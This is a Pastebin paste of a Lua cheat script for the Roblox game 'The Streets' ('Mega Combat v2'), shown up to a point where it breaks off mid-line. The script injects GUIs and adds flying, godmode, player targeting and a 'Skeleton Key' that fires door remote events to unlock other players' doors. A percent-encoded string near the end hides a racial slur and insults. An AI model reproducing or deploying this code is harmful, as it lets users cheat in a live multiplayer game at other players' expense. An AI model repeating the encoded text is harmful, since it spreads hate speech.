Advertisement
Guest User

Aidez (Edited Version for Watts/Jc/Onyx only)

a guest
Sep 18th, 2019
193
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 180.73 KB | None | 0 0
  1. if game.PlaceId == 455366377 or game.PlaceId == 4669040 then
  2. print("Currently Playing The Streets")
  3. print("Waiting for player to confirm...")
  4. else
  5. return
  6. end
  7. repeat wait() until game:FindFirstChild("Players") ~= nil
  8. repeat wait() until game.Players.LocalPlayer ~= nil
  9. undecided = true
  10. continue = false
  11. local ConfirmGui = Instance.new("ScreenGui")
  12. local Drag = Instance.new("TextButton")
  13. local Background = Instance.new("ImageLabel")
  14. local deny = Instance.new("TextButton")
  15. local confirm = Instance.new("TextButton")
  16. local question = Instance.new("TextLabel")
  17.  
  18. ConfirmGui.Name = "ConfirmGui"
  19. ConfirmGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  20.  
  21. Drag.Name = "Drag"
  22. Drag.Parent = ConfirmGui
  23. Drag.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  24. Drag.BackgroundTransparency = 0.9990000128746
  25. Drag.BorderColor3 = Color3.new(1, 1, 1)
  26. Drag.Position = UDim2.new(0.392041147, 0, 0.23756206, 0)
  27. Drag.Size = UDim2.new(0, 414, 0, 414)
  28. Drag.Font = Enum.Font.ArialBold
  29. Drag.Text = ""
  30. Drag.TextColor3 = Color3.new(1, 1, 1)
  31. Drag.TextSize = 14
  32. Drag.TextWrapped = true
  33.  
  34. Background.Name = "Background"
  35. Background.Parent = Drag
  36. Background.BackgroundColor3 = Color3.new(1, 1, 1)
  37. Background.Position = UDim2.new(0.00235595694, 0, -0.00123840338, 0)
  38. Background.Size = UDim2.new(0, 412, 0, 412)
  39. Background.ZIndex = 0
  40. Background.Image = "rbxassetid://0&hash=12ed3f0fdc0764ab01645b356df12dc3"
  41.  
  42. deny.Name = "deny"
  43. deny.Parent = Background
  44. deny.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  45. deny.BackgroundTransparency = 0.80000001192093
  46. deny.BorderColor3 = Color3.new(1, 1, 1)
  47. deny.Position = UDim2.new(0.552222788, 0, 0.668497741, 0)
  48. deny.Size = UDim2.new(0, 174, 0, 37)
  49. deny.ZIndex = 2
  50. deny.Font = Enum.Font.ArialBold
  51. deny.Text = "No"
  52. deny.TextColor3 = Color3.new(1, 1, 1)
  53. deny.TextSize = 25
  54. deny.TextWrapped = true
  55.  
  56. confirm.Name = "confirm"
  57. confirm.Parent = Background
  58. confirm.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  59. confirm.BackgroundTransparency = 0.80000001192093
  60. confirm.BorderColor3 = Color3.new(1, 1, 1)
  61. confirm.Position = UDim2.new(0.0400868692, 0, 0.669110954, 0)
  62. confirm.Size = UDim2.new(0, 174, 0, 37)
  63. confirm.ZIndex = 2
  64. confirm.Font = Enum.Font.ArialBold
  65. confirm.Text = "Yes"
  66. confirm.TextColor3 = Color3.new(1, 1, 1)
  67. confirm.TextSize = 25
  68.  
  69. question.Name = "question"
  70. question.Parent = Background
  71. question.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  72. question.BackgroundTransparency = 0.89999997615814
  73. question.Position = UDim2.new(0.00248703454, 0, -0.00103163486, 0)
  74. question.Size = UDim2.new(0, 412, 0, 118)
  75. question.Font = Enum.Font.SourceSans
  76. question.Text = "You're currently in The Streets. Would you like to inject \"Mega Combat v2\"?"
  77. question.TextColor3 = Color3.new(1, 1, 1)
  78. question.TextScaled = true
  79. question.TextSize = 14
  80. question.TextWrapped = true
  81.  
  82. deny.MouseButton1Click:Connect(function()
  83. ConfirmGui:Destroy()
  84. undecided = false
  85. continue = false
  86. end)
  87.  
  88.  
  89. confirm.MouseButton1Click:Connect(function()
  90. ConfirmGui:Destroy()
  91. undecided = false
  92. continue = true
  93. end)
  94.  
  95. while undecided do
  96. wait()
  97. end
  98.  
  99.  
  100. if continue == true then
  101. print("Confirmed! Injecting script...")
  102. elseif continue == false then
  103. return
  104. end
  105.  
  106. wait(1)
  107.  
  108. SpaceHeld = false
  109. jumpgcheck = true
  110. jumpspeed = 0.9
  111. targetee = nil
  112. pleaseshoot = false
  113. IsFirstPerson = false
  114. ShiftHeld = false
  115. WHeld = false
  116. SHeld = false
  117. AHeld = false
  118. DHeld = false
  119. gcheckrun = true
  120. runspeed = 1
  121. local stationaryrespawn = true
  122. local needsrespawning = false
  123. local haspos = false
  124. local pos = CFrame.new()
  125. fireuzi = false
  126. targetfireuzi = false
  127. forward = false
  128. flymode = false
  129. flyw = false
  130. flys = false
  131. flyd = false
  132. flya = false
  133. flysp = false
  134. flyct = false
  135. Mouse = game.Players.LocalPlayer:GetMouse()
  136. flyspeed = 0.5
  137. staypos = CFrame.new()
  138. stay = false
  139. originalgrip = CFrame.new()
  140. gundebounce = false
  141. flydebounce = false
  142. smalldebounce = false
  143. bigdebounce = false
  144. bigfire = false
  145. mouse = game.Players.LocalPlayer:GetMouse()
  146. local LP = game.Players.LocalPlayer
  147. local Mouse = LP:GetMouse()
  148. toggler = false
  149. FLYING = false
  150. iyflyspeed = 2
  151. attackradius = 35
  152. planks = {}
  153. plankpos = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,-20,0)
  154. plankfollow = false
  155. planksurf = false
  156. TeleportService = game:GetService("TeleportService")
  157. dontshoot = {}
  158. freeshoot = false
  159. wirerunning = true
  160. godmode = false
  161. enhancedboombox = false
  162. suicidetools = {}
  163. clickspam = false
  164. debunce = false
  165. visualize = false
  166. visualizetools = {}
  167. rot = 0
  168. sine = 0
  169. voidtoggle = false
  170. voidprocessing = false
  171. StartMessage = "Asset_ID_To_Version_ID_Script_Made_By_Aidez"
  172. hat = nil
  173. autoreset = false
  174. bringboomsback = false
  175. hitlisttitles = {
  176. "KILL\nV";
  177. "KILL THIS PERSON\nV";
  178. }
  179. visualizemode = 1
  180. rolldebounce = false
  181. continueunmutable = false
  182.  
  183.  
  184.  
  185. local TargetGUI = Instance.new("ScreenGui")
  186. local Target = Instance.new("TextBox")
  187. local Background = Instance.new("ImageLabel")
  188.  
  189. TargetGUI.Name = "TargetGUI"
  190. TargetGUI.Parent = game.CoreGui
  191.  
  192. Target.Name = "Target"
  193. Target.Parent = TargetGUI
  194. Target.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  195. Target.BackgroundTransparency = 0.30000001192093
  196. Target.ClipsDescendants = true
  197. Target.Position = UDim2.new(0.726104677, 0, 0.717467248, 0)
  198. Target.Size = UDim2.new(0, 100, 0, 21)
  199. Target.Font = Enum.Font.SourceSans
  200. Target.PlaceholderText = "[TARGET]"
  201. Target.Text = ""
  202. Target.TextColor3 = Color3.new(1, 1, 1)
  203. Target.TextSize = 14
  204. Target.TextWrapped = true
  205. Target.Draggable = true
  206.  
  207. Background.Name = "Background"
  208. Background.Parent = Target
  209. Background.BackgroundColor3 = Color3.new(1, 1, 1)
  210. Background.Position = UDim2.new(-9.90098342e-05, 0, -1.57506061, 0)
  211. Background.Size = UDim2.new(0, 100, 0, 86)
  212. Background.ZIndex = 0
  213. Background.Image = "rbxassetid://0&hash=2396ab74bcae41f2340b198666905246"
  214.  
  215.  
  216. local Respawning = Instance.new("ScreenGui")
  217. local RespawningButton = Instance.new("TextButton")
  218.  
  219.  
  220.  
  221. Respawning.Name = "Respawning"
  222. Respawning.Parent = game.CoreGui
  223.  
  224.  
  225.  
  226. RespawningButton.Name = "RespawningButton"
  227. RespawningButton.Parent = Respawning
  228. RespawningButton.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  229. RespawningButton.BackgroundTransparency = 0.30000001192093
  230. RespawningButton.BorderSizePixel = 0
  231. RespawningButton.Position = UDim2.new(0.0391057241, 0, 0.826617789, 0)
  232. RespawningButton.Size = UDim2.new(0, 83, 0, 34)
  233. RespawningButton.Font = Enum.Font.SourceSans
  234. RespawningButton.Text = "Not Returning"
  235. RespawningButton.TextColor3 = Color3.new(1, 1, 1)
  236. RespawningButton.TextSize = 20
  237. RespawningButton.TextScaled = true
  238. RespawningButton.Draggable = true
  239.  
  240.  
  241. local creditsdab = Instance.new("ScreenGui")
  242. local Frame = Instance.new("Frame")
  243. local aidez = Instance.new("ImageLabel")
  244. local names = Instance.new("TextLabel")
  245. local scriptmadeby = Instance.new("TextLabel")
  246. local scriptmadeby_2 = Instance.new("TextLabel")
  247. local x = Instance.new("TextButton")
  248.  
  249.  
  250. creditsdab.Name = "creditsdab"
  251. creditsdab.Parent = game.CoreGui
  252.  
  253. Frame.Parent = creditsdab
  254. Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  255. Frame.Position = UDim2.new(0.399554282, 0, 0.241054624, 0)
  256. Frame.Size = UDim2.new(0, 274, 0, 274)
  257.  
  258. aidez.Name = "aidez"
  259. aidez.Parent = Frame
  260. aidez.BackgroundColor3 = Color3.new(1, 1, 1)
  261. aidez.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  262. aidez.Position = UDim2.new(-0.000740621239, 0, 0.000178694725, 0)
  263. aidez.Size = UDim2.new(0, 274, 0, 274)
  264. aidez.Image = "rbxassetid://0&hash=9c3f6c00707d5ebde710fd2f3efd2b5e"
  265.  
  266. names.Name = "names"
  267. names.Parent = Frame
  268. names.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  269. names.BackgroundTransparency = 0.30000001192093
  270. names.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  271. names.Position = UDim2.new(0, 0, 0.897810221, 0)
  272. names.Size = UDim2.new(0, 274, 0, 28)
  273. names.Font = Enum.Font.SourceSans
  274. names.Text = "Vortexturize | aidez moi#4192 | Aidez "
  275. names.TextColor3 = Color3.new(1, 1, 1)
  276. names.TextSize = 14
  277.  
  278. scriptmadeby.Name = "scriptmadeby"
  279. scriptmadeby.Parent = Frame
  280. scriptmadeby.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  281. scriptmadeby.BackgroundTransparency = 0.30000001192093
  282. scriptmadeby.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  283. scriptmadeby.Position = UDim2.new(0, 0, -0.102189779, 0)
  284. scriptmadeby.Size = UDim2.new(0, 274, 0, 28)
  285. scriptmadeby.Font = Enum.Font.SourceSans
  286. scriptmadeby.Text = "Script made by"
  287. scriptmadeby.TextColor3 = Color3.new(1, 1, 1)
  288. scriptmadeby.TextSize = 14
  289.  
  290. scriptmadeby_2.Name = "scriptmadeby"
  291. scriptmadeby_2.Parent = Frame
  292. scriptmadeby_2.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  293. scriptmadeby_2.BackgroundTransparency = 0.30000001192093
  294. scriptmadeby_2.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  295. scriptmadeby_2.Position = UDim2.new(0, 0, -0.164233565, 0)
  296. scriptmadeby_2.Size = UDim2.new(0, 274, 0, 17)
  297. scriptmadeby_2.Font = Enum.Font.SourceSans
  298. scriptmadeby_2.Text = "Open the dev consol for a list of features. (F9 or Shift + F9)"
  299. scriptmadeby_2.TextColor3 = Color3.new(1, 1, 1)
  300. scriptmadeby_2.TextScaled = true
  301. scriptmadeby_2.TextSize = 14
  302. scriptmadeby_2.TextWrapped = true
  303.  
  304. x.Name = "x"
  305. x.Parent = creditsdab
  306. x.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  307. x.BackgroundTransparency = 0.30000001192093
  308. x.BorderColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  309. x.Position = UDim2.new(0.600445747, 0, 0.188323915, 0)
  310. x.Size = UDim2.new(0, 28, 0, 28)
  311. x.Font = Enum.Font.SourceSansSemibold
  312. x.Text = "X"
  313. x.TextColor3 = Color3.new(1, 1, 1)
  314. x.TextSize = 30
  315.  
  316. x.MouseButton1Click:connect(function()
  317. creditsdab:Destroy()
  318. end)
  319.  
  320. function giveSKey()
  321. local epic = Instance.new("Tool")
  322. local dab = Instance.new("Part")
  323. local plr = game.Players.LocalPlayer
  324. local tar_obj = nil
  325. dab.Parent = epic
  326. dab.Size = Vector3.new(0.2, 0.2, 0.2)
  327. epic.Parent = plr.Backpack
  328. epic.Name = "Skeleton Key"
  329. epic.ToolTip = "Click on a door with this"
  330. dab.Name = "Handle"
  331. epic.Equipped:Connect(function(m_S)
  332. m_S.Button1Down:Connect(function()
  333. tar_obj = m_S.Target
  334. door = tar_obj.Parent
  335. if door:FindFirstChild("Lock") then
  336. door.Lock.ClickDetector.RemoteEvent:FireServer()
  337. wait(0.2)
  338. door.Click.ClickDetector.RemoteEvent:FireServer()
  339. elseif tar_obj.Parent.Parent:FindFirstChild("Lock") then
  340. tar_obj.Parent.Parent.Lock.ClickDetector.RemoteEvent:FireServer()
  341. wait(0.2)
  342. tar_obj.Parent.Parent.Click.ClickDetector.RemoteEvent:FireServer()
  343. end
  344. end)
  345. end)
  346. end -- giveSKey Function end
  347. giveSKey()
  348.  
  349. function sFLY() -- from rocky2u cmdscript
  350. repeat wait() until LP and LP.Character and LP.Character:FindFirstChild('HumanoidRootPart') and LP.Character:FindFirstChild('Humanoid')
  351. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
  352. repeat wait() until Mouse
  353. local T = game.Players.LocalPlayer.Character.HumanoidRootPart
  354. local CONTROL = {F = 0, B = 0, L = 0, R = 0}
  355. local lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  356. local SPEED = 0
  357.  
  358. local function FLY()
  359. FLYING = true
  360. local BG = Instance.new('BodyGyro', T)
  361. local BV = Instance.new('BodyVelocity', T)
  362. BG.P = 9e4
  363. BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  364. BG.cframe = T.CFrame
  365. BV.velocity = Vector3.new(0, 0.1, 0)
  366. BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  367. spawn(function()
  368. repeat wait()
  369. if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  370. SPEED = 50
  371. elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  372. SPEED = 0
  373. end
  374. if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  375. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  376. lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  377. elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  378. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  379. else
  380. BV.velocity = Vector3.new(0, 0.1, 0)
  381. end
  382. BG.cframe = workspace.CurrentCamera.CoordinateFrame
  383. until not FLYING
  384. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  385. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  386. SPEED = 0
  387. BG:destroy()
  388. BV:destroy()
  389. end)
  390. end
  391. Mouse.KeyDown:connect(function(KEY)
  392. if KEY:lower() == 'w' then
  393. CONTROL.F = iyflyspeed
  394. elseif KEY:lower() == 's' then
  395. CONTROL.B = -iyflyspeed
  396. elseif KEY:lower() == 'a' then
  397. CONTROL.L = -iyflyspeed
  398. elseif KEY:lower() == 'd' then
  399. CONTROL.R = iyflyspeed
  400. end
  401. end)
  402. Mouse.KeyUp:connect(function(KEY)
  403. if KEY:lower() == 'w' then
  404. CONTROL.F = 0
  405. elseif KEY:lower() == 's' then
  406. CONTROL.B = 0
  407. elseif KEY:lower() == 'a' then
  408. CONTROL.L = 0
  409. elseif KEY:lower() == 'd' then
  410. CONTROL.R = 0
  411. end
  412. end)
  413. FLY()
  414. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
  415. end
  416.  
  417.  
  418. function NOFLY()
  419. FLYING = false
  420. end
  421.  
  422. function startflying()
  423. game.Players.LocalPlayer.PlayerGui.LocalScript.Disabled = true
  424. wait()
  425. sFLY()
  426. wait(0.1)
  427. game.Players.LocalPlayer.PlayerGui.LocalScript.Disabled = false
  428. local Float = Instance.new('Part', game.Players.LocalPlayer.Character)
  429. Float.Name = 'Float'
  430. Float.Transparency = 1
  431. Float.Size = Vector3.new(6,1,6)
  432. Float.Anchored = true
  433. end
  434.  
  435.  
  436. function godbindablefunc(content)
  437. godmode = true
  438. if game.Players.LocalPlayer.Character ~= nil then
  439. game.Players.LocalPlayer.Character:BreakJoints()
  440. end
  441. end
  442.  
  443. godbindable = Instance.new("BindableFunction")
  444. godbindable.OnInvoke = godbindablefunc
  445.  
  446. function promptgod()
  447. game.StarterGui:SetCore("SendNotification", {
  448. Title = "Turn on God!";
  449. Text = "You need god mode on to do that!";
  450. Icon = "rbxassetid://1221422603";
  451. Duration = 5;
  452. Callback = godbindable;
  453. Button1 = "Turn on Godmode";
  454. })
  455. end
  456.  
  457.  
  458. function CreateDonationGUI()
  459. local DonateGUI = Instance.new("ScreenGui")
  460. local Frame = Instance.new("Frame")
  461. local Background = Instance.new("ImageLabel")
  462. local _10 = Instance.new("TextButton")
  463. local _30 = Instance.new("TextButton")
  464. local _50 = Instance.new("TextButton")
  465. local _60 = Instance.new("TextButton")
  466. local _100 = Instance.new("TextButton")
  467. local _200 = Instance.new("TextButton")
  468. local X = Instance.new("TextButton")
  469.  
  470. DonateGUI.Name = "DonateGUI"
  471. DonateGUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  472. DonateGUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  473.  
  474. Frame.Parent = DonateGUI
  475. Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  476. Frame.ClipsDescendants = true
  477. Frame.Position = UDim2.new(0.340173662, 0, 0.153321981, 0)
  478. Frame.Size = UDim2.new(0, 405, 0, 407)
  479.  
  480. Background.Name = "Background"
  481. Background.Parent = Frame
  482. Background.BackgroundColor3 = Color3.new(0, 0, 0)
  483. Background.Position = UDim2.new(-0.00493827462, 0, -0.00737100746, 0)
  484. Background.Size = UDim2.new(0, 409, 0, 413)
  485. Background.Image = "rbxassetid://3207314205"
  486.  
  487. _10.Name = "10"
  488. _10.Parent = Background
  489. _10.BackgroundColor3 = Color3.new(1, 1, 1)
  490. _10.BackgroundTransparency = 0.69999998807907
  491. _10.Position = UDim2.new(0.254278719, 0, 0.0992735997, 0)
  492. _10.Size = UDim2.new(0, 200, 0, 50)
  493. _10.Font = Enum.Font.SourceSans
  494. _10.Text = "Donate 10"
  495. _10.TextColor3 = Color3.new(1, 1, 1)
  496. _10.TextSize = 18
  497. _10.TextStrokeTransparency = 0.10000000149012
  498.  
  499. _30.Name = "30"
  500. _30.Parent = Background
  501. _30.BackgroundColor3 = Color3.new(1, 1, 1)
  502. _30.BackgroundTransparency = 0.69999998807907
  503. _30.Position = UDim2.new(0.254278719, 0, 0.237288117, 0)
  504. _30.Size = UDim2.new(0, 200, 0, 50)
  505. _30.Font = Enum.Font.SourceSans
  506. _30.Text = "Donate 30"
  507. _30.TextColor3 = Color3.new(1, 1, 1)
  508. _30.TextSize = 18
  509. _30.TextStrokeTransparency = 0.10000000149012
  510.  
  511. _50.Name = "50"
  512. _50.Parent = Background
  513. _50.BackgroundColor3 = Color3.new(1, 1, 1)
  514. _50.BackgroundTransparency = 0.69999998807907
  515. _50.Position = UDim2.new(0.254278719, 0, 0.372881353, 0)
  516. _50.Size = UDim2.new(0, 200, 0, 50)
  517. _50.Font = Enum.Font.SourceSans
  518. _50.Text = "Donate 50"
  519. _50.TextColor3 = Color3.new(1, 1, 1)
  520. _50.TextSize = 18
  521. _50.TextStrokeTransparency = 0.10000000149012
  522.  
  523. _60.Name = "60"
  524. _60.Parent = Background
  525. _60.BackgroundColor3 = Color3.new(1, 1, 1)
  526. _60.BackgroundTransparency = 0.69999998807907
  527. _60.Position = UDim2.new(0.254278719, 0, 0.508474588, 0)
  528. _60.Size = UDim2.new(0, 200, 0, 50)
  529. _60.Font = Enum.Font.SourceSans
  530. _60.Text = "Donate 60"
  531. _60.TextColor3 = Color3.new(1, 1, 1)
  532. _60.TextSize = 18
  533. _60.TextStrokeTransparency = 0.10000000149012
  534.  
  535. _100.Name = "100"
  536. _100.Parent = Background
  537. _100.BackgroundColor3 = Color3.new(1, 1, 1)
  538. _100.BackgroundTransparency = 0.69999998807907
  539. _100.Position = UDim2.new(0.254278719, 0, 0.644067824, 0)
  540. _100.Size = UDim2.new(0, 200, 0, 50)
  541. _100.Font = Enum.Font.SourceSans
  542. _100.Text = "Donate 100"
  543. _100.TextColor3 = Color3.new(1, 1, 1)
  544. _100.TextSize = 18
  545. _100.TextStrokeTransparency = 0.10000000149012
  546.  
  547. _200.Name = "200"
  548. _200.Parent = Background
  549. _200.BackgroundColor3 = Color3.new(1, 1, 1)
  550. _200.BackgroundTransparency = 0.69999998807907
  551. _200.Position = UDim2.new(0.254278719, 0, 0.779661059, 0)
  552. _200.Size = UDim2.new(0, 200, 0, 50)
  553. _200.Font = Enum.Font.SourceSans
  554. _200.Text = "Donate 200"
  555. _200.TextColor3 = Color3.new(1, 1, 1)
  556. _200.TextSize = 18
  557. _200.TextStrokeTransparency = 0.10000000149012
  558.  
  559. X.Name = "X"
  560. X.Parent = Background
  561. X.BackgroundColor3 = Color3.new(1, 1, 1)
  562. X.BorderSizePixel = 3
  563. X.Position = UDim2.new(0.90220046, 0, 0.0072639226, 0)
  564. X.Size = UDim2.new(0, 38, 0, 38)
  565. X.Font = Enum.Font.SourceSans
  566. X.Text = "X"
  567. X.TextColor3 = Color3.new(0, 0, 0)
  568. X.TextSize = 50
  569.  
  570. X.MouseButton1Click:connect(function()
  571. DonateGUI:Destroy()
  572. end)
  573.  
  574. _10.MouseButton1Click:connect(function()
  575. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,649311217,true)
  576. end)
  577.  
  578. _30.MouseButton1Click:connect(function()
  579. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,918194587,true)
  580. end)
  581.  
  582. _50.MouseButton1Click:connect(function()
  583. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,858859976,true)
  584. end)
  585.  
  586. _60.MouseButton1Click:connect(function()
  587. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,885034827,true)
  588. end)
  589.  
  590. _100.MouseButton1Click:connect(function()
  591. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,649314421,true)
  592. end)
  593.  
  594. _200.MouseButton1Click:connect(function()
  595. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,649315461,true)
  596. end)
  597. end
  598.  
  599. function discordlink()
  600. local sg = Instance.new("ScreenGui")
  601. sg.Name = "DiscordGui"
  602. sg.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  603.  
  604. local frame = Instance.new("Frame")
  605. frame.Style = "RobloxRound"
  606. frame.Size = UDim2.new(0.25, 0, 0.25, 0)
  607. frame.Position = UDim2.new((1-frame.Size.X.Scale)/2, 0, (1-frame.Size.Y.Scale)/2, 0)
  608. frame.Parent = sg
  609. frame.Draggable = true
  610.  
  611. local text = Instance.new("TextLabel")
  612. text.BackgroundTransparency = 1
  613. text.TextStrokeTransparency = 0
  614. text.TextColor3 = Color3.new(1, 1, 1)
  615. text.Size = UDim2.new(1, 0, 0.6, 0)
  616. text.TextScaled = true
  617. text.Text = "Did you know I have a discord?\n\nPlease join :("
  618. text.Parent = frame
  619.  
  620. local input = Instance.new("TextLabel")
  621. input.BackgroundColor3 = Color3.new(0, 0, 0)
  622. input.BackgroundTransparency = 0.5
  623. input.BorderColor3 = Color3.new(1, 1, 1)
  624. input.TextColor3 = Color3.new(1, 1, 1)
  625. input.TextStrokeTransparency = 1
  626. input.TextScaled = true
  627. input.Text = "https://discord.gg/4FCbEbZ"
  628. input.Size = UDim2.new(1, 0, 0.2, 0)
  629. input.Position = UDim2.new(0, 0, 0.6, 0)
  630. input.Parent = frame
  631.  
  632. local button = Instance.new("TextButton")
  633. button.Style = "RobloxButton"
  634. button.Size = UDim2.new(0.75, 0, 0.2, 0)
  635. button.Position = UDim2.new(0.125, 0, 0.8, 0)
  636. button.TextColor3 = Color3.new(1, 1, 1)
  637. button.TextStrokeTransparency = 0
  638. button.Text = "Copy to Clipboard (Synapse X only)"
  639. button.TextScaled = true
  640. button.Parent = frame
  641. button.MouseButton1Click:connect(function()
  642. if syn then
  643. syn.write_clipboard(tostring(input.Text))
  644. button.Text = "Thank you!"
  645. wait(0.5)
  646. sg:Destroy()
  647. end
  648. end)
  649.  
  650. local Xbutton = Instance.new("TextButton")
  651. Xbutton.Style = "RobloxButton"
  652. Xbutton.Size = UDim2.new(0.15, 0, 0.2, 0)
  653. Xbutton.Position = UDim2.new(0.96, 0, -0.16, 0)
  654. Xbutton.TextColor3 = Color3.new(1, 1, 1)
  655. Xbutton.TextStrokeTransparency = 0
  656. Xbutton.Text = "X"
  657. Xbutton.TextScaled = true
  658. Xbutton.Parent = frame
  659. Xbutton.MouseButton1Click:connect(function()
  660. sg:Destroy()
  661. end)
  662. end
  663.  
  664.  
  665. function findplayer(namey)
  666. local name = string.lower(namey)
  667. local player = nil
  668.  
  669. names = game.Players:GetChildren()
  670. for i,v in pairs(names) do
  671. strlower = string.lower(v.Name)
  672. sub = string.sub(strlower,1,#name)
  673. if name == sub then
  674. player = v
  675. if player.Name ~= game.Players.LocalPlayer.Name then
  676.  
  677. end
  678. end
  679. end
  680. if player then
  681. return player
  682. else
  683. return false
  684. end
  685. end
  686.  
  687. function IsInTable(table, tofind)
  688. local found = false
  689. for i,v in pairs(table) do
  690. if v == tofind then
  691. found = true
  692. break
  693. end
  694. end
  695. return found
  696. end
  697.  
  698. local function removeothercash(instance)
  699. for i,v in pairs(instance:GetChildren()) do
  700. if v.Name == "ESP" and v:FindFirstChild("CASH") then
  701. v:Destroy()
  702. end
  703. removeothercash(v)
  704. end
  705. end
  706.  
  707.  
  708. function gettools()
  709. local matchingtools = {}
  710. for i = 1,#visualizetools do
  711. local toolname = string.lower(visualizetools[i])
  712. if toolname == "hat" and not game.Players.LocalPlayer.Backpack:FindFirstChild("hat") and not game.Players.LocalPlayer.Character:FindFirstChild("hat") and game.Players.LocalPlayer.Character.Torso:FindFirstChild("Song") then
  713. local LocalPlayer = game:GetService("Players").LocalPlayer
  714. for _, hat in pairs(LocalPlayer.Character.Humanoid:GetAccessories()) do
  715. if hat:FindFirstChild("Handle") then
  716. local tool = Instance.new("Tool", LocalPlayer.Backpack)
  717. tool.Name = "hat"
  718. local hathandle = hat.Handle
  719. hathandle:FindFirstChildOfClass("Weld"):Destroy()
  720. hathandle.Parent = tool
  721. hathandle.Massless = true
  722. end
  723. end
  724. wait()
  725. end
  726. for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  727. if v:IsA("Tool") then
  728. local lowername = string.lower(v.Name)
  729. if string.sub(lowername, 1, #toolname) == toolname then
  730. table.insert(matchingtools, v)
  731. end
  732. end
  733. end
  734. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  735. if v:IsA("Tool") then
  736. local lowername = string.lower(v.Name)
  737. if string.sub(lowername, 1, #toolname) == toolname then
  738. table.insert(matchingtools, v)
  739. end
  740. end
  741. end
  742. end
  743. return matchingtools
  744. end
  745.  
  746. function toversionid(id)
  747. local dab = game:HttpGet("https://www.roblox.com/studio/plugins/info?assetId="..id)
  748. if string.find(dab, 'value="') then
  749. local epic = string.find(dab, 'value="')
  750. local almost = string.sub(dab, epic + 7, epic + 18)
  751. local filter1 = string.gsub(almost, " ", "")
  752. local filter2 = string.gsub(filter1, "/", "")
  753. local filter3 = string.gsub(filter2, ">", "")
  754. local filter4 = string.gsub(filter3, '"', "")
  755. local versionid = string.gsub(filter4, "<", "")
  756. return versionid
  757. end
  758. end
  759.  
  760.  
  761.  
  762. function percentencode(id)
  763. local third = string.gsub(tostring(id), "3", "%%33")
  764. local first = string.gsub(third, "1", "%%31")
  765. local second = string.gsub(first, "2", "%%32")
  766. local fourth = string.gsub(second, "4", "%%34")
  767. local fifth = string.gsub(fourth, "5", "%%35")
  768. local sixth = string.gsub(fifth, "6", "%%36")
  769. local seventh = string.gsub(sixth, "7", "%%37")
  770. local eighth = string.gsub(seventh, "8", "%%38")
  771. local ninth = string.gsub(eighth, "9", "%%39")
  772. local PercentEncodedId = ninth
  773. return PercentEncodedId
  774. end
  775.  
  776. function toplayable(id)
  777. local playableid = StartMessage..".hash_%61%6c%73%6f%5f%79%6f%75%5f%74%68%69%6e%6b%5f%64%65%63%72%79%70%74%69%6e%67%5f%74%68%69%73%5f%69%73%5f%67%6f%6e%6e%61%5f%68%65%6c%70%3f%5f%46%55%43%4b%5f%55%50%5f%4e%49%47%47%41%21%5f%59%6f%75%5f%77%72%6f%6e%67%5f%4c%4f%4c%21%5f%43%59%41%5f%63%75%6e%74%5f%61%73%73%5f%6c%61%74%65%72%5f%73%69%6e%63%65%72%65%6c%79%5f%42%6f%62%5f%52%6f%73%73%5f&%76%65%72%73%69%6f%6e%69%64="..tostring(id)
